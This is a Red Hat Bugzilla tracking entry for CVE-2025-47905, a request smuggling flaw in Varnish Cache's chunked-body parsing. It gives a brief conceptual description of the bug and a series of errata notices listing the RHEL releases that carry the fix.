Bug 2364235 (CVE-2025-47905)

Summary: CVE-2025-47905 varnish: request smuggling attacks
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security DevOps Team <prodsec-dev>
Status: NEW --- QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A vulnerability was found in Varnish Cache. This vulnerability may allow request smuggling attacks, where a malicious actor can craft seemingly legitimate HTTP requests. This issue could result in an unspecified system caching incorrect content that can expose confidential information.
 Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 2369404    
Bug Blocks:    
Deadline: 2025-05-12   

Description OSIDB Bzimport 2025-05-05 20:54:13 UTC 
This vulnerability may allow for request smuggling attacks, potentially resulting in an unspecified system caching incorrect content. 

The bug is an error in how to parse a chunked message body. The RFC tells to use only CRLF sequence to end a line: https://www.rfc-editor.org/rfc/rfc9112.html#name-chunked-transfer-coding
However, Varnish has up until now mistakenly treated white-spaces as line ending as well. This allows a client to construct a HTTP/1 request to smuggle another malicious request in the body of the first request. When this is used against an endpoint that is blindly forwarding HTTP requests, it can lead to ways for this client to abuse this behavior of Varnish.
Comment 2 errata-xmlrpc 2025-05-29 08:45:08 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.8 Extended Update Support

Via RHSA-2025:8294 https://access.redhat.com/errata/RHSA-2025:8294
Comment 3 errata-xmlrpc 2025-05-29 12:33:29 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support
  Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions
  Red Hat Enterprise Linux 8.6 Telecommunications Update Service

Via RHSA-2025:8310 https://access.redhat.com/errata/RHSA-2025:8310
Comment 4 errata-xmlrpc 2025-06-02 01:53:22 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.2 Advanced Update Support

Via RHSA-2025:8339 https://access.redhat.com/errata/RHSA-2025:8339
Comment 5 errata-xmlrpc 2025-06-02 02:11:48 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support
  Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions
  Red Hat Enterprise Linux 8.4 Telecommunications Update Service

Via RHSA-2025:8340 https://access.redhat.com/errata/RHSA-2025:8340
Comment 6 errata-xmlrpc 2025-06-02 02:13:19 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2025:8337 https://access.redhat.com/errata/RHSA-2025:8337
Comment 7 errata-xmlrpc 2025-06-02 03:03:06 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions

Via RHSA-2025:8350 https://access.redhat.com/errata/RHSA-2025:8350
Comment 8 errata-xmlrpc 2025-06-02 03:09:21 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.4 Extended Update Support

Via RHSA-2025:8349 https://access.redhat.com/errata/RHSA-2025:8349
Comment 9 errata-xmlrpc 2025-06-02 03:14:11 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.2 Extended Update Support

Via RHSA-2025:8351 https://access.redhat.com/errata/RHSA-2025:8351
Comment 10 errata-xmlrpc 2025-06-02 03:17:34 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2025:8336 https://access.redhat.com/errata/RHSA-2025:8336
Comment 12 errata-xmlrpc 2025-06-04 22:24:39 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 10

Via RHSA-2025:8550 https://access.redhat.com/errata/RHSA-2025:8550